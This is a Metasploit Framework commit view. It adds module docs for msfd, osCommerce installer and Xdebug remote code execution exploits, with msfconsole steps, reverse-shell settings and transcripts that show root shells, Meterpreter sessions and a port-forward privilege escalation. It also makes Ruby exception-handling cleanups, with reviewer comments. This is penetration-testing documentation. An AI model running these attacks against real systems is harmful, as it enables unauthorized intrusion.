Merge branch 'master' into ms-2962

This commit is contained in:
christopher lee 2018-05-02 15:31:57 -05:00
commit 038fe03777
132 changed files with 2642 additions and 2212 deletions

View File

@ -18,9 +18,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.33)
metasploit-payloads (= 1.3.34)
metasploit_data_models
metasploit_payloads-mettle (= 0.3.7)
metasploit_payloads-mettle (= 0.3.8)
mqtt
msgpack
nessus_rest
@ -121,7 +121,7 @@ GEM
dnsruby (1.60.2)
docile (1.3.0)
erubis (2.7.0)
eventmachine (1.2.5)
eventmachine (1.2.6)
factory_bot (4.8.2)
activesupport (>= 3.0.0)
factory_bot_rails (4.8.2)
@ -161,7 +161,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.33)
metasploit-payloads (1.3.34)
metasploit_data_models (3.0.0)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -172,7 +172,7 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.3.7)
metasploit_payloads-mettle (0.3.8)
method_source (0.9.0)
mini_portile2 (2.3.0)
minitest (5.11.3)

View File

@ -0,0 +1,99 @@
## Description
This module connects to the Metasploit msf daemon and uses the ruby interpreter
to achieve a shell. This module can be used when the vulnerable service is only
listening on localhost and the attacker has not achieved a foothold on the
machine. To achieve code execution, the data is sent from the victim's browser.
To achieve this, the victim must visit the attacker's web site.
## Vulnerable Application
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
of providing remote access. The msf daemon provides no means of authentication
and is therefore vulnerable against an attacker who has IP access to the daemon.
In those cases where the daemon is listening on localhost, we take advantage of
the fact that the victim's web browser has IP access to the daemon.
Because the msfconsole-program is line-based, it is possible to successfully
send commands through the HTTP-protocol. This module takes advantage of this by
placing the msfconsole-command in the POST-data of a HTTP-request. Since these
POST-requests are considered safe to send cross-domain, it is possible to send
them from the attacker's web application and to localhost using the victim's
browser.
All versions of Metasploit are affected by this module, however testing has only
been performed on the following targets:
* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
Chrome)
***NB!*** Exploitation on Windows had a higher degree of success, when the
quiet-flag was sent to the msf daemon. On Linux, it made no difference.
Source code and installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start the vulnerable service `msfd -q -f`
2. Start `msfconsole`
3. Do: `use exploit/multi/browser/msfd_rce_browser`
4. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
5. Do: `set RPORT [PORT]` (default: `55554`)
6. Do: `set PAYLOAD [PAYLOAD]`
7. Do: `exploit`
8. Do: Visit the listed URL from the victim's machine
9. You should get a shell
## Options
Options unique for this module is described below.
**REMOTE_IP**
IP to target when running inside the victim's browser.
**REMOTE_PORT**
Remote port the vulnerable service is running at, default is 55554.
## Scenarios
### Through the victim's browser
```
msf5 > use exploit/multi/browser/msfd_rce_browser
msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
lhost => 192.168.0.17
msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
lport => 443
msf5 exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
http://0.0.0.0:8080/J5ras6oYftFWW4
[*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
[*] Server started.
```
Visit the web site listed in a browser on the victim's machine and you should
get the output below.
```
[*] 192.168.0.17 msfd_rce_browser - 192.168.0.17 msfd_rce_browser
Sending HTML...
[*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
id
[*] exec: id
uid=0(root) gid=0(root) groups=0(root)
```
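Review bot: the option names in this doc do not match the verification steps: step 5 says `set RPORT [PORT]` but the Options section documents **REMOTE_PORT**, so one of the two is wrong for this module; please align them (and `REMOTE_IP` likewise if the module's datastore key differs). Two smaller points in the same hunk: "Options unique for this module is described below" should read "are described", and the scenario transcript keeps the `[-] Handler failed to bind to 192.168.0.17:443:- -` line from the author's container setup, which will confuse readers who expect the bind to succeed; either trim it or add a sentence explaining that the handler fell back to `0.0.0.0:443`.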

View File

@ -0,0 +1,38 @@
## Vulnerable Application
osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the `/install/` directory was not removed, it is possible for an unauthenticated attacker to run the `install_4.php` script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.
## Verification Steps
1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip)
2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
3. `set RHOST IP`
4. `set PAYLOAD php/meterpreter/reverse_tcp`
5. `set LHOST IP`
6. `exploit`
7. **Verify** a new Meterpreter session is started
## Scenarios
### osCommerce version 2.3.4.1 on Debian
```
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
RHOST => 172.16.40.188
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit
[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (37543 bytes) to 172.16.40.188
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100
meterpreter > sysinfo
Computer : oscommerce
OS : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
Meterpreter : php/linux
meterpreter >
```
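Review bot: the install link in step 1 points at an archive named `oscommerce-2.3.4.zip` while the doc and the heading say 2.3.4.1; please confirm which version the module was verified against and make the text and the link agree. It would also help to state in the Vulnerable Application paragraph that the module requires `/install/` to still be present and that `check` (if the module implements it) is the way to confirm that before running `exploit`.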

View File

@ -0,0 +1,106 @@
## Description
This module connects to the Metasploit msf daemon and uses the ruby interpreter
to achieve a shell. This module can target remote systems if the daemon is
exposed on a remote interface or it can be used for privilege escalation when
the attacker has a foothold. If used as privilege escalation, port forwarding
must be set up.
## Vulnerable Application
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
of providing remote access. The msf daemon provides no means of authentication
and is therefore vulnerable against an attacker who has IP access to the daemon.
All versions of Metasploit are affected by this module, however testing has only
been performed on the following targets:
* Metasploit 5.0.0 on Ubuntu 16.04
* Metasploit 4.16.51 on Windows 7
Source code and installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start the vulnerable service: `msfd -f -q -a 0.0.0.0`
2. Start `msfconsole`
3. Do: `use exploit/multi/misc/msfd_rce_remote`
4. Do: `set RHOST [IP]`
5. Do: `set RPORT [PORT]` (default: `55554`)
6. Do: `set PAYLOAD [PAYLOAD]`
7. Do: `exploit`
8. You should get a shell
## Options
**RHOST**
Remote Host
**RPORT**
Remote port the vulnerable service is running at, default is 55554.
## Scenarios
### Remote target
```
msf5 > use exploit/multi/misc/msfd_rce_remote
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101
rhost => 192.168.56.101
msf5 exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17
lhost => 192.168.0.17
msf5 exploit(multi/misc/msfd_rce_remote) > set lport 443
lport => 443
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
[*] Command shell session 1 opened (172.17.0.2:443 -> 192.168.0.17:48152) at 2018-04-22 18:43:41 +0000
whoami
robin
```
### Local target - privilege escalation
```
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > shell
Process 17366 created.
Channel 1 created.
netstat -lntup|grep 55554
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:55554 0.0.0.0:* LISTEN -
ps aux | grep msfd
root 17303 3.3 13.8 535168 283492 pts/18 Sl+ 20:47 0:08 ruby ./msfd -f -q
^C
Terminate channel 1? [y/N] y
meterpreter > portfwd add -l 55554 -p 55554 -r 127.0.0.1
[*] Local TCP relay created: :55554 <-> 127.0.0.1:55554
meterpreter > background
[*] Backgrounding session 2...
msf5 > use exploit/multi/misc/msfd_rce_remote
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
[*] Command shell session 3 opened (172.17.0.2:443 -> 192.168.0.17:48300) at 2018-04-22 18:55:19 +0000
id
uid=0(root) gid=0(root) groups=0(root)
```
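Review bot: the "Local target - privilege escalation" scenario does not stand on its own: after `portfwd add` it runs `use exploit/multi/misc/msfd_rce_remote`, `set rhost 127.0.0.1`, `exploit` and relies on `payload`, `lhost` and `lport` still being set from the earlier "Remote target" run in the same console. Please repeat those three `set` commands in this scenario so a reader who starts from it gets the same result. Minor: the Options entry for **RHOST** ("Remote Host") could mention that with a Meterpreter port forward in place it is the local end of the relay, i.e. `127.0.0.1`, which is exactly what the scenario shows.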

View File

@ -0,0 +1,127 @@
## Vulnerable Application
[Xdebug](https://xdebug.org/docs-dbgp.php) is an actively-maintained PHP debugging tool that supports remote debugging of server-side PHP code
This module exploits an unauthenticated vulnerability that allows for the upload of a PHP file and subsequent execution to provide a Meterpreter session back. The module was tested on XDebug version 2.5.5
The vulnerability was discovered by [Ricter Zheng](https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface) (WARNING: This link is in Chinese. [Google Translate version](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fricterz.me%2Fposts%2FXdebug%3A%20A%20Tiny%20Attack%20Surface))
### Setting up XDebug 2.5.5 on xUbuntu 16.04 x64 Desktop
Start with a LAMP server:
```
sudo apt update && sudo apt install -y tasksel
sudo tasksel install lamp-server
```
Now grab XDebug, specifically the version cited by @MinatoTW:
```
wget https://xdebug.org/files/xdebug-2.5.5.tgz
tar xvzf xdebug-2.5.5.tgz
cd xdebug-2.5.5/
php -i
```
Paste the contents of your `php -i` output into [the XDebug installation wizard](https://xdebug.org/wizard.php), which gave me the following:
```
sudo apt install -y php7.0-dev
phpize && ./configure && make
sudo cp modules/xdebug.so /usr/lib/php/20151012/
```
The final step of the wizard is to configure `php.ini`:
```
sudo -s
cat >> /etc/php/7.0/cli/php.ini <<EOL
zend_extension = /usr/lib/php/20151012/xdebug.so
xdebug.remote_enable = 1
xdebug.remote_handler = dbgp
xdebug.remote_autostart = 0
xdebug.remote_connect_back = 1
xdebug.remote_port = 9000
xdebug.remote_host = 127.0.0.1
xdebug.profiler_enable=0
xdebug.profiler_enable_trigger=1
xdebug.profiler_output_dir="/tmp"`
EOL
exit
```
Now that the PHP CLI environment is configured, repeat the above steps for the Apache2 configuration:
```
sudo -s
cat >> /etc/php/7.0/cli/php.ini <<EOL
zend_extension = /usr/lib/php/20151012/xdebug.so
xdebug.remote_enable = 1
xdebug.remote_handler = dbgp
xdebug.remote_autostart = 0
xdebug.remote_connect_back = 1
xdebug.remote_port = 9000
xdebug.remote_host = 127.0.0.1
xdebug.profiler_enable=0
xdebug.profiler_enable_trigger=1
xdebug.profiler_output_dir="/tmp"`
EOL
exit
```
And restart Apache2 for good measure:
```
sudo service apache2 restart
```
And now test that XDebug is working:
```
php -r 'echo xdebug_time_index();'; echo
```
You should see a fairly small number, in my case `4.6014785766602E-5`, which indicates the number of seconds since the php script started, thus the incredibly small number.
## Verification Steps
- Start `msfconsole`
- `use exploits/unix/http/xdebug_rce`
- `check`
- `set RHOST 192.168.69.2`
- `set LHOST 192.168.69.1`
- `set VERBOSE true` (optional)
- `exploit`
## Scenarios
### XDebug 2.5.5 on Ubuntu 16.04 with Apache2 2.4.18
msf5 exploit(unix/http/xdebug_unauth_exec) > check
[*] 192.168.69.2:80 - Request sent
Date: Fri, 27 Apr 2018 21:00:37 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: XDEBUG_SESSION=WIO6hf4Wez; expires=Fri, 27-Apr-2018 22:00:37 GMT; Max-Age=3600; path=/
Content-Length: 16
Content-Type: text/html; charset=UTF-8
[+] 192.168.69.2:80 - Looks like remote server has xdebug enabled
[*] 192.168.69.2:80 The target service is running, but could not be validated.
msf5 exploit(unix/http/xdebug_unauth_exec) > exploit
[*] Started reverse TCP handler on 192.168.69.1:4444
[*] 192.168.69.2:80 - Waiting for client response.
[*] 192.168.69.2:80 - Receiving response
508<?xml version="1.0" encoding="iso-8859-1"?>
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.0.28-0ubuntu0.16.04.1" protocol_version="1.0" appid="28166" idekey="5Gg6S9au8B"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
[*] 192.168.69.2:80 - Shell might take upto a minute to respond.Please be patient.
[*] 192.168.69.2:80 - Sending payload of size 2098 bytes
[*] Sending stage (37775 bytes) to 192.168.69.2
[*] Meterpreter session 1 opened (192.168.69.1:4444 -> 192.168.69.2:55506) at 2018-04-27 15:57:58 -0500
[+] 192.168.69.2:80 - Deleted /tmp/OLEaK
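Review bot: the "repeat the above steps for the Apache2 configuration" block appends to `/etc/php/7.0/cli/php.ini` again instead of the Apache SAPI ini (`/etc/php/7.0/apache2/php.ini`), so following the doc as written never enables Xdebug for Apache and the scenario cannot be reproduced; the `cat >> ... <<EOL` target in the second block needs to change. Both heredocs also carry a stray trailing backtick on `xdebug.profiler_output_dir="/tmp"\``, which will be written into php.ini verbatim. Two consistency points: the verification steps say `use exploits/unix/http/xdebug_rce` while the transcript shows `exploit(unix/http/xdebug_unauth_exec)`, so one of the module paths is wrong; and the scenario transcript starting at `msf5 exploit(unix/http/xdebug_unauth_exec) > check` is not wrapped in a code fence like the other blocks in this file.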

View File

@ -4,7 +4,7 @@ module CredentialDataProxy
begin
data_service = self.get_data_service
data_service.create_credential(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem creating credential")
end
end
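Review bot: narrowing `rescue Exception => e` to `rescue => e` (StandardError) is the right fix here: the old form also swallowed `Interrupt`, `SystemExit` and `NoMemoryError`, so a Ctrl-C or an `exit` inside a data-service call would have been logged as "Problem creating credential" and ignored. The same mechanical change is repeated across the other data-proxy and servlet files in this commit; the note applies to all of them. One thing worth checking while here: after `log_error` runs, the method falls through and returns nil, so callers that expect a credential object back still need to guard against nil.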
@ -14,7 +14,7 @@ module CredentialDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.creds(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving credentials")
end
end

View File

@ -8,7 +8,7 @@ module DbExportDataProxy
}
add_opts_workspace(opts)
data_service.run_db_export(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem generating DB Export")
end
end

View File

@ -5,7 +5,7 @@ module EventDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_event(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting event")
end
end

View File

@ -4,7 +4,7 @@ module ExploitDataProxy
begin
data_service = self.get_data_service
data_service.report_exploit_attempt(host, opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting exploit attempt")
end
end
@ -14,7 +14,7 @@ module ExploitDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_exploit_failure(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting exploit failure")
end
end
@ -24,7 +24,7 @@ module ExploitDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_exploit_success(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting exploit success")
end
end

View File

@ -9,7 +9,7 @@ module HostDataProxy
opts[:address] = addresses
opts[:search_term] = search_term
data_service.hosts(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving hosts")
end
end
@ -37,7 +37,7 @@ module HostDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_host(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting host")
end
end
@ -47,7 +47,7 @@ module HostDataProxy
data_service = self.get_data_service
add_opts_workspace(hosts)
data_service.report_hosts(hosts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting hosts")
end
end
@ -56,7 +56,7 @@ module HostDataProxy
begin
data_service = self.get_data_service
data_service.update_host(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating host")
end
end
@ -65,7 +65,7 @@ module HostDataProxy
begin
data_service = self.get_data_service
data_service.delete_host(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem deleting host")
end
end

View File

@ -8,7 +8,7 @@ module LootDataProxy
end
add_opts_workspace(opts)
data_service.report_loot(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting loot")
end
end
@ -24,7 +24,7 @@ module LootDataProxy
data_service = self.get_data_service
add_opts_workspace(opts, wspace)
data_service.loot(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving loot")
end
end
@ -35,7 +35,7 @@ module LootDataProxy
begin
data_service = self.get_data_service
data_service.update_loot(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating loot")
end
end

View File

@ -5,7 +5,7 @@ module NmapDataProxy
data_service = self.get_data_service
add_opts_workspace(args)
data_service.import_nmap_xml_file(args)
rescue Exception => e
rescue => e
self.log_error(e, "Problem importing Nmap XML file")
end
end

View File

@ -5,7 +5,7 @@ module NoteDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.notes(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving notes")
end
end
@ -20,7 +20,7 @@ module NoteDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_note(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting note")
end
end
@ -29,7 +29,7 @@ module NoteDataProxy
begin
data_service = self.get_data_service
data_service.update_note(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating note")
end
end
@ -38,7 +38,7 @@ module NoteDataProxy
begin
data_service = self.get_data_service
data_service.delete_note(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem deleting note")
end
end

View File

@ -5,7 +5,7 @@ module ServiceDataProxy
data_service = self.get_data_service
add_opts_workspace(opts, wspace)
data_service.services(opts)
rescue Exception => e
rescue => e
self.log_error(e, 'Problem retrieving services')
end
end
@ -19,7 +19,7 @@ module ServiceDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_service(opts)
rescue Exception => e
rescue => e
self.log_error(e, 'Problem reporting service')
end
end
@ -28,7 +28,7 @@ module ServiceDataProxy
begin
data_service = self.get_data_service
data_service.update_service(opts)
rescue Exception => e
rescue => e
self.log_error(e, 'Problem updating service')
end
end
@ -37,7 +37,7 @@ module ServiceDataProxy
begin
data_service = self.get_data_service
data_service.delete_service(opts)
rescue Exception => e
rescue => e
self.log_error(e, 'Problem deleting service')
end
end

View File

@ -3,7 +3,7 @@ module SessionDataProxy
begin
data_service = self.get_data_service
data_service.report_session(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting session")
end
end

View File

@ -4,7 +4,7 @@ module SessionEventDataProxy
begin
data_service = self.get_data_service()
data_service.report_session_event(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting session event")
end
end

View File

@ -4,7 +4,7 @@ module VulnAttemptDataProxy
begin
data_service = self.get_data_service
data_service.vuln_attempts(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving vulnerability attempts")
end
end
@ -14,7 +14,7 @@ module VulnAttemptDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_vuln_attempt(vuln, opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting vulnerability attempts")
end
end

View File

@ -6,7 +6,7 @@ module VulnDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.vulns(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving vulns")
end
end
@ -16,7 +16,7 @@ module VulnDataProxy
data_service = self.get_data_service
add_opts_workspace(opts)
data_service.report_vuln(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting vuln")
end
end
@ -25,7 +25,7 @@ module VulnDataProxy
begin
data_service = self.get_data_service
data_service.update_vuln(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating vuln")
end
end
@ -34,7 +34,7 @@ module VulnDataProxy
begin
data_service = self.get_data_service
data_service.delete_vuln(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem deleting vuln")
end
end

View File

@ -3,7 +3,7 @@ module WebDataProxy
begin
data_service = self.get_data_service()
data_service.report_web_site(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem reporting website")
end
end

View File

@ -5,7 +5,7 @@ module WorkspaceDataProxy
data_service = self.get_data_service
opts = { name: workspace_name }
data_service.workspaces(opts).first
rescue Exception => e
rescue => e
self.log_error(e, "Problem finding workspace")
end
end
@ -15,7 +15,7 @@ module WorkspaceDataProxy
data_service = self.get_data_service
opts = { name: workspace_name }
data_service.add_workspace(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem adding workspace")
end
end
@ -27,7 +27,7 @@ module WorkspaceDataProxy
ws = add_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
end
ws
rescue Exception => e
rescue => e
self.log_error(e, "Problem finding default workspace")
end
end
@ -42,7 +42,7 @@ module WorkspaceDataProxy
warn "@current_workspace was not set. Setting to default_workspace: #{default_workspace.name}"
@current_workspace = default_workspace
end
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving workspace")
end
end
@ -51,7 +51,7 @@ module WorkspaceDataProxy
def workspace=(workspace)
begin
@current_workspace = workspace
rescue Exception => e
rescue => e
self.log_error(e, "Problem setting workspace")
end
end
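Review bot: the `begin`/`rescue` around `@current_workspace = workspace` in `workspace=` protects a plain instance-variable assignment, which cannot raise a `StandardError`; rather than just narrowing the rescue, drop the `begin`/`rescue`/`end` entirely and leave the one-line body.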
@ -60,7 +60,7 @@ module WorkspaceDataProxy
begin
data_service = self.get_data_service
data_service.workspaces(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem retrieving workspaces")
end
end
@ -69,7 +69,7 @@ module WorkspaceDataProxy
begin
data_service = self.get_data_service
data_service.delete_workspaces(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem deleting workspaces")
end
end
@ -78,7 +78,7 @@ module WorkspaceDataProxy
begin
data_service = self.get_data_service
data_service.update_workspace(opts)
rescue Exception => e
rescue => e
self.log_error(e, "Problem updating workspace")
end
end

View File

@ -20,7 +20,7 @@ module ResponseDataHelper
return JSON.parse(body).symbolize_keys
end
end
rescue Exception => e
rescue => e
elog "Error parsing response: #{e.message}"
e.backtrace.each { |line| elog line }
end
@ -36,7 +36,7 @@ module ResponseDataHelper
if !body.nil? && !body.empty?
return JSON.parse(body, object_class: OpenStruct)
end
rescue Exception => e
rescue => e
elog "open struct conversion failed #{e.message}"
end
end
@ -64,7 +64,7 @@ module ResponseDataHelper
end
return rv
end
rescue Exception => e
rescue => e
elog "Mdm Object conversion failed #{e.message}"
e.backtrace.each { |line| elog "#{line}\n" }
end
@ -87,7 +87,7 @@ module ResponseDataHelper
unless File.exists?(save_path) && File.read(save_path) == decoded_file
File.open(save_path, 'w+') { |file| file.write(decoded_file) }
end
rescue Exception => e
rescue => e
elog "There was an error writing the file: #{e}"
e.backtrace.each { |line| elog "#{line}\n"}
end
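Review bot: `File.exists?(save_path)` on the unchanged context line is the deprecated alias; since this hunk is already being touched, change it to `File.exist?(save_path)` so the method does not start warning on newer Rubies. Also note that `File.read` of the existing file followed by a `w+` open is a check-then-write that is fine for a local cache, but `elog "There was an error writing the file: #{e}"` will include the full `save_path` in the log, which is intended here but worth keeping in mind if the log is shared.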

View File

@ -1,19 +1,19 @@
module NoteDataService
def notes(opts)
raise NotImplementedError, 'NoteDataService#notes is not implemented'
raise 'NoteDataService#notes is not implemented'
end
def report_note(opts)
raise NotImplementedError, 'NoteDataService#report_note is not implemented'
raise 'NoteDataService#report_note is not implemented'
end
def update_note(opts)
raise NotImplementedError, 'NoteDataService#update_note is not implemented'
raise 'NoteDataService#update_note is not implemented'
end
def delete_note(opts)
raise NotImplementedError, 'NoteDataService#delete_note is not implemented'
raise 'NoteDataService#delete_note is not implemented'
end
end
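Review bot: replacing `raise NotImplementedError, '...'` with a bare `raise '...'` makes these stubs raise `RuntimeError`, presumably so that the new `rescue => e` sites in the proxies catch them (`NotImplementedError` is a `ScriptError`, not a `StandardError`, so it would have escaped). The downside is that callers can no longer tell "not implemented" from any other runtime failure; a small `StandardError` subclass (for example `class NotImplemented < StandardError; end` in the data-service namespace) would keep the message text and still be caught by the proxies.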

View File

@ -5,7 +5,7 @@ module Metasploit
module Framework
module LoginScanner
class BavisionCamerasException < Exception; end
class BavisionCamerasException < StandardError; end
class BavisionCameras < HTTP

View File

@ -235,12 +235,13 @@ class DataStore < Hash
# Override merge! so that we merge the aliases and imported hashes
#
def merge!(other)
super
if other.is_a? DataStore
self.aliases.merge!(other.aliases)
self.imported.merge!(other.imported)
self.imported_by.merge!(other.imported_by)
end
# call super last so that we return a reference to ourselves
super
end
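Review bot: the reorder does fix the return value, since previously `merge!` returned the result of the `if` (the `imported_by` hash, or nil when `other` was not a `DataStore`) rather than the receiver; `Hash#merge!` returns `self`, so ending on `super` is enough and no explicit `self` is needed. The one ordering change to confirm is that `aliases`, `imported` and `imported_by` are now merged before the key/value merge in `super`; if `DataStore` overrides `[]=` or `store` to consult `aliases`, the earlier alias merge could change which keys `super` writes.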
#

View File

@ -20,7 +20,7 @@ class JobProcessor
wrapper = @job_queue.pop()
begin
wrapper.job.call(wrapper.job_args)
rescue Exception => e
rescue => e
print_error "Error executing job #{e.message}", e
end
end

View File

@ -27,7 +27,7 @@ module CredentialServlet
response << json
end
set_json_response(response)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
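Review bot: with the narrowed rescue, `set_error_on_response(e)` is now reached only for `StandardError`, which is correct, but please confirm what `set_error_on_response` puts on the wire: if it echoes `e.message` (or a backtrace) into the JSON body, database and file-system details from the exception can reach any client of this servlet. A generic error string in the response and the full exception in `elog` is the safer split. This applies to every servlet hunk in this commit that ends in `set_error_on_response(e)`.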

View File

@ -24,7 +24,7 @@ module DbExportServlet
response = {}
response[:db_export_file] = encoded_file
set_json_response(response)
rescue Exception => e
rescue => e
set_error_on_response(e)
ensure
# Ensure the temporary file gets cleaned up

View File

@ -32,7 +32,7 @@ module HostServlet
data = get_db.hosts(sanitized_params)
includes = [:loots]
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -45,7 +45,7 @@ module HostServlet
data = get_db.report_host(opts)
}
exec_report_job(request, &job)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -59,7 +59,7 @@ module HostServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_host(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -71,7 +71,7 @@ module HostServlet
opts = parse_json_request(request, false)
data = get_db.delete_host(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

View File

@ -30,7 +30,7 @@ module LootServlet
loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
end
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -60,7 +60,7 @@ module LootServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_loot(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -72,7 +72,7 @@ module LootServlet
opts = parse_json_request(request, false)
data = get_db.delete_loot(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

View File

@ -27,7 +27,7 @@ module NoteServlet
data = get_db.notes(sanitized_params)
includes = [:host]
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -40,7 +40,7 @@ module NoteServlet
get_db.report_note(opts)
}
exec_report_job(request, &job)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -54,7 +54,7 @@ module NoteServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_note(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -66,7 +66,7 @@ module NoteServlet
opts = parse_json_request(request, false)
data = get_db.delete_note(opts)
set_json_response(data)
rescue Exception => e
